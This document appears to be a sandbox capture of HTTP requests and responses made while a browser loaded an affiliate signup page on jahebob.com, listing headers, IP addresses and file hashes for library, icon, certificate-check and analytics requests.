Date: Wed, 06 Jul 2022 11:30:29 GMT
Last-Modified: Wed, 06 Jul 2022 10:13:32 GMT
Server: ECS (bsa/EB1C)
X-Cache: Miss from cloudfront
Via: 1.1 227a1815a1677b9cf6dd587e443000b8.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-P1
X-Amz-Cf-Id: -cWyhG4_zdrV1yTWKf9yV5PWEu56hUEueyUrCqrFPtkOQxLSsWy8BA==
Age: 4617

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "C02392E54536262666988192AD9A1088F25AA405038B95CB2E72AD84630D3A64"
Last-Modified: Tue, 05 Jul 2022 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6078
Expires: Wed, 06 Jul 2022 13:11:48 GMT
Date: Wed, 06 Jul 2022 11:30:30 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "5AF3BC840A5FB02C03CCEBF976AEF68E554095FC8463212C5FD89ED910090332"
Last-Modified: Tue, 05 Jul 2022 12:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=19009
Expires: Wed, 06 Jul 2022 16:47:19 GMT
Date: Wed, 06 Jul 2022 11:30:30 GMT
Connection: keep-alive

                                        
                                            GET /ajax/libs/jquery/3.4.1/jquery.min.js HTTP/1.1 
Host: ajax.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://jahebob.com
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.202
HTTP/2 200 OK
                                        
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers"
report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
timing-allow-origin: *
content-length: 30774
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sat, 02 Jul 2022 22:09:36 GMT
expires: Sun, 02 Jul 2023 22:09:36 GMT
cache-control: public, max-age=31536000, stale-while-revalidate=2592000
age: 307255
last-modified: Mon, 13 May 2019 14:37:17 GMT
content-type: text/javascript; charset=UTF-8
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   30774
Md5:    81182f4b684635f6bdcbdd907ee66f25
Sha1:   a1f2f151df72ede41397c8131bd47a3ce85575b3
Sha256: be40946c98d9a78a3c7c9ad097d379ab12549a195bd7a4766919a1d3fd987396
                                        
                                            GET /ajax/bootstrap/3.3.7/bootstrap.min.js HTTP/1.1 
Host: ajax.aspnetcdn.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://jahebob.com
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         152.199.19.160
HTTP/2 200 OK
                                        
content-encoding: gzip
accept-ranges: bytes
access-control-allow-origin: *
age: 30275590
cache-control: public,max-age=31536000
content-type: application/javascript
date: Wed, 06 Jul 2022 11:30:31 GMT
etag: "df64de7cb33d21:0"
last-modified: Mon, 31 Oct 2016 23:09:59 GMT
server: ECAcc (ska/F6C5)
timing-allow-origin: *
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 13045
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32033)
Size:   13045
Md5:    3f9ec5c445cf8f77a6390449a7541505
Sha1:   669418484f3303459663923b63a579a879727b05
Sha256: d93d22df61a1ecf911a54330835bb468fb26e5f10e0555cb48a464dfe69d7648
                                        
GET /ajax/bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1
Host: ajax.aspnetcdn.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
152.199.19.160
HTTP/2 200 OK
content-encoding: gzip
accept-ranges: bytes
access-control-allow-origin: *
age: 1833767
cache-control: public,max-age=31536000
content-type: text/css
date: Wed, 06 Jul 2022 11:30:31 GMT
etag: "0e914f2cb33d21:0"
last-modified: Mon, 31 Oct 2016 23:10:18 GMT
server: ECAcc (ska/F740)
timing-allow-origin: *
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 19629
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65371)
Size:   19629
Md5:    7e2bb6028f0b19917a1a2d1944fc72b1
Sha1:   e1837fc75ee2ddd24c6e1df6b309ea212b57e681
Sha256: cc6093bd7162882fd34252fb5d3e8e7d07247e3b70fad894320bf2a960abeda5
                                        
GET /signup/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff HTTP/1.1
Host: tfcfnls.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://fuck-fantasy.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
207.120.33.39
HTTP/2 302 Found
date: Wed, 06 Jul 2022 11:30:30 GMT
content-type: text/html; charset=UTF-8
location: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
set-cookie: PHPSESSID=6268d206e078f965d7abaa2408ff401b; path=/; secure; SameSite=None
cache-control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
pragma: no-cache
expires: 0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
x-varnish: 16943737
age: 0
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Miss
section-io-id: 18c0de085130b1b6209325a0dff7efdd
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  gzip compressed data, max speed, from Unix\012- data
Size:   29886
Md5:    66a7630ff4484fac43325fdc9ddf4885
Sha1:   965ee99c2d43d3b2ebb2c06181646dcee3f0b20e
Sha256: 69285dca652c01399a39b081564951a5876d221a18c2708a0aa0a69f30fe902f
                                        
GET /common_tpls/images/icons/email.png HTTP/1.1
Host: jahebob.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
207.120.33.9
HTTP/2 200 OK
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: image/png
content-length: 1254
last-modified: Tue, 16 Jun 2020 16:45:10 GMT
etag: "5ee8f716-4e6"
section-io-cache-id: 2a1094a12cfc49a3069c8d2f01a59845
x-varnish: 10951642 10857638
age: 3317
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
accept-ranges: bytes
section-io-id: 03939a390ad23313f644c6fca2f48c48
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 26 x 26, 8-bit/color RGB, non-interlaced\012- data
Size:   1254
Md5:    a86d99b9176d82a211cfa29b2f0b353f
Sha1:   62947ddfd87e3a21869818885e4bfa4e55ad0c11
Sha256: f8e82194c97e2a11a8c77fcd55d1ded51a1943b78eefac8475890f665dc620f1
                                        
GET /common_tpls/images/icons/password.png HTTP/1.1
Host: jahebob.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
207.120.33.9
HTTP/2 200 OK
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: image/png
content-length: 1452
last-modified: Tue, 16 Jun 2020 16:45:10 GMT
etag: "5ee8f716-5ac"
section-io-cache-id: 5495abe621cb6522a0ccded46142b7e6
x-varnish: 12883815 15922179
age: 731
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
accept-ranges: bytes
section-io-id: 4a4738e5802ed4fb8cbd15446ec1638c
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 26 x 26, 8-bit/color RGB, non-interlaced\012- data
Size:   1452
Md5:    6f100f1cdbdce928118ffa4c9293ca5b
Sha1:   6b1a3593e792d4c00187d60560dd03fb42df1156
Sha256: 8c1a6b9e0c63edc7fa86898148dc6493cd56113fabbf85d901f7af4c180fce74
                                        
GET /common_tpls/images/icons/fname.png HTTP/1.1
Host: jahebob.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
207.120.33.9
HTTP/2 200 OK
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: image/png
content-length: 1649
last-modified: Tue, 28 Nov 2017 20:51:58 GMT
etag: "5a1dcc6e-671"
section-io-cache-id: ee3008df309a674c37d5d59b19265435
x-varnish: 10951643 10857617
age: 3325
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
accept-ranges: bytes
section-io-id: 76116e969b09f65c805753dbd1d3c6af
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 26 x 26, 8-bit/color RGBA, non-interlaced\012- data
Size:   1649
Md5:    5c846870756544f39604e671d4111b9d
Sha1:   304938c74246e228fa82d8ca40201c3db6098074
Sha256: d43abf8c5665519a3fe3f7e90298fc17b62e06d8ada1b90a44ea9985a62abb4d
                                        
GET /common_tpls/images/icons/address.png HTTP/1.1
Host: jahebob.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
207.120.33.9
HTTP/2 200 OK
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: image/png
content-length: 1167
last-modified: Tue, 16 Jun 2020 16:45:10 GMT
etag: "5ee8f716-48f"
section-io-cache-id: b5774294bca0b5091681ef15dc4321d2
x-varnish: 12883816 16407334
age: 762
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
accept-ranges: bytes
section-io-id: 9c096d12ea866b4d4c630c5202b6a8e4
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 26 x 26, 8-bit/color RGB, non-interlaced\012- data
Size:   1167
Md5:    b579e9868402d708e54e1a980166c444
Sha1:   1c58e2890b934c0b1ab057f3ac28bedd2a082d19
Sha256: 67756f8b542c7823bcdba421219c3b8e1ee472748d8c3463534f667271356dfb
                                        
GET /releases/v5.15.4/css/pro-v4-font-face.min.css?token=b314bdf1b3 HTTP/1.1
Host: ka-p.fontawesome.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://jahebob.com/
Origin: https://jahebob.com
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
104.18.23.52
HTTP/2 200 OK
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: text/css
content-length: 2603
access-control-allow-origin: *
cache-control: max-age=31556926
content-encoding: gzip
etag: "610ae215-a2b"
last-modified: Wed, 04 Aug 2021 18:53:09 GMT
vary: Origin, Accept-Encoding, Access-Control-Request-Headers, Access-Control-Request-Method
cf-cache-status: HIT
age: 410238
accept-ranges: bytes
expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
server: cloudflare
cf-ray: 7268024298160b51-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (27832)
Size:   2603
Md5:    eaaabd3f60063923cd5333eb1d7a20a1
Sha1:   0da69706105e28896a1f6eeaa91d5bec1b82f7f1
Sha256: f863309ec0ac675409167610ff9776fa9c7620d6ee3592cc0c19d0b883ff2f70
                                        
GET /common_tpls/js/form_support.js?v=1516308712 HTTP/1.1
Host: jahebob.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
207.120.33.9
HTTP/2 200 OK
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Tue, 19 Jan 2021 00:12:19 GMT
etag: W/"600623e3-3d1"
section-io-cache-id: 3b38e74c214f12cccc966e55ccc4ea33
x-varnish: 10951641 10885453
age: 3315
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
content-encoding: gzip
section-io-id: 0ed5bf30741981518fd990ef80ab891b
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (26366)
Size:   4715
Md5:    0f933f47f2bca6f8e62cebdc4ce264f6
Sha1:   7bac167eba53aebc8ffc61eb34e78bb4427e6409
Sha256: 1887debeafa96b7085773c88c7919f8f73163ee2ca47a2e8ea1bb8a343c823a3
                                        
GET /common_tpls/js/validate_form_v2.js?jsv=24 HTTP/1.1
Host: jahebob.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/acct/epc69324/add/?epcVIP=63.1066.g123&email=&password=&firstname=&lastname=&zip=&act=epc69324.47200-205354.4013.37_4013_8000_f510768889f57977d167c8d1e518271f..6lp4070641428.8000&f_color=ffffff&epcCID=R2A3zeE577n1ffqef4n4Edd2qcB918wdl&rtid=7509426281
Cookie: PHPSESSID=6a699032107175d3c5c446bb62f0492e
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
207.120.33.9
HTTP/2 200 OK
date: Wed, 06 Jul 2022 11:30:31 GMT
content-type: application/javascript
vary: Accept-Encoding
last-modified: Thu, 26 May 2022 18:57:54 GMT
etag: W/"628fcdb2-5a4a"
section-io-cache-id: b2feb59a57d3190d02f6b52e5c4746cd
x-varnish: 12883814 13521790
age: 821
via: 1.1 varnish (Varnish/6.3)
section-io-cache: Hit
content-encoding: gzip
section-io-id: 084a8a78695d4db2188089e31a5558aa
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Algol 68 source text\012- Pascal source, Unicode text, UTF-8 text, with very long lines (42283)
Size:   59782
Md5:    53a98329475d7cd49b2acd16115195f3
Sha1:   df78b36b164e146b25e78c72b1a87d1665db279b
Sha256: a4dd399ed95bd089f69aa0223820d307549cb97edf92a35678ad5bc0336fc46f
                                        
POST /gsalphasha2g2 HTTP/1.1
Host: ocsp2.globalsign.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
104.18.21.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 06 Jul 2022 11:30:31 GMT
Content-Length: 1423
Connection: keep-alive
Expires: Sun, 10 Jul 2022 09:59:46 GMT
ETag: "399e5db6762e02d3f433e334a6c02f6ada5763b0"
Last-Modified: Wed, 06 Jul 2022 09:59:46 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 1363
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 72680242ba5eb50c-OSL


--- Additional Info ---
Magic:  data
Size:   1423
Md5:    6ab72ac3f746b923bfde482deba9e3cc
Sha1:   399e5db6762e02d3f433e334a6c02f6ada5763b0
Sha256: ef2bc9806b7e3557348a2ce89aa84c2f7badfdf314df03240f13f0cd08f31851
                                        
GET /nr-spa-1216.min.js HTTP/1.1
Host: js-agent.newrelic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
151.101.86.137
HTTP/2 200 OK
x-amz-id-2: TAwVDFAylU9PwNPPW/eXC4UyIMC8EQ1d6JNW9Q+uXGnPmL1fuimq9M3lAe733gCMeKNDiCQX1YM=
x-amz-request-id: SYTECJR5CMD8NJ8E
last-modified: Thu, 14 Apr 2022 16:45:57 GMT
etag: "63e2df852d15ab21d7ff8fc4363222e8"
x-amz-version-id: UU.F5jvoumAjQChriwTQHbisCFw_OInU
content-type: application/javascript
server: AmazonS3
cache-control: public, max-age=7200, stale-if-error=604800
content-encoding: gzip
accept-ranges: bytes
date: Wed, 06 Jul 2022 11:30:31 GMT
via: 1.1 varnish
x-served-by: cache-bma1680-BMA
x-cache: HIT
x-cache-hits: 3086
x-timer: S1657107032.773206,VS0,VE0
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
content-length: 18216
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (32010)
Size:   18216
Md5:    6561a2403142205f966207d61576f1a6
Sha1:   1310e72f494e12ab63a4280fc1600a2c89dc9bb8
Sha256: 0e496fcab0b9120938373e271fa6631b7da17adf33f8a490637467c170a3e37a
                                        
GET /1/NRJS-53a3e8e5a523894a2ee?a=936088839&v=1216.487a282&to=M1JTNkMACEoAVRcNDAoYZBBYTg9XBVMbShMMRw%3D%3D&rst=3536&ck=1&ref=https://jahebob.com/acct/epc69324/add/&ap=96&be=3035&fe=3462&dc=3459&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1657107028219,%22n%22:0,%22f%22:2156,%22dn%22:2158,%22dne%22:2229,%22c%22:2229,%22s%22:2342,%22ce%22:2573,%22rq%22:2573,%22rp%22:2915,%22rpe%22:2915,%22dl%22:2921,%22di%22:3449,%22ds%22:3459,%22de%22:3461,%22dc%22:3461,%22l%22:3461,%22le%22:3463%7D,%22navigation%22:%7B%7D%7D&at=HxVQQAsaG0Q%3D&jsonp=NREUM.setToken HTTP/1.1
Host: bam.nr-data.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
162.247.241.14
HTTP/1.1 200 OK
Content-Type: text/javascript
Date: Wed, 06 Jul 2022 11:30:32 GMT
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 726802457815b50f-OSL
Access-Control-Allow-Origin: *
Set-Cookie: JSESSIONID=5fdc6d425462294f; Path=/; Domain=.nr-data.net; Secure; SameSite=None
CF-Cache-Status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
Cross-Origin-Resource-Policy: cross-origin
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Vary: Accept-Encoding
Server: cloudflare
Content-Encoding: gzip


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   77
Md5:    f1442f5831dbbe0210da2d7a4180d6b8
Sha1:   2ade23c6c7a001c66f0c0a9a101ec152747b434e
Sha256: c6acf9fb2ecc1b144c51bd0337bbf1c26db3df2f649ac2da5c56db20d93eb3ef
                                        
POST /events/1/NRJS-53a3e8e5a523894a2ee?a=936088839&v=1216.487a282&to=M1JTNkMACEoAVRcNDAoYZBBYTg9XBVMbShMMRw%3D%3D&rst=3995&ck=1&ref=https://jahebob.com/acct/epc69324/add/ HTTP/1.1
Host: bam.nr-data.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
content-type: text/plain
Content-Length: 672
Origin: https://jahebob.com
Connection: keep-alive
Referer: https://jahebob.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
162.247.241.14
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Wed, 06 Jul 2022 11:30:32 GMT
Content-Length: 24
Connection: keep-alive
CF-Ray: 726802479b06b50f-OSL
Access-Control-Allow-Origin: https://jahebob.com
CF-Cache-Status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Vary: Accept-Encoding
Server: cloudflare


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   24
Md5:    bc32ed98d624acb4008f986349a20d26
Sha1:   2d3df8c11d2168ce2c27e0937421d11d85016361
Sha256: 0c9cf152a0ad00d4f102c93c613c104914be5517ac8f8e0831727f8bfbe8b300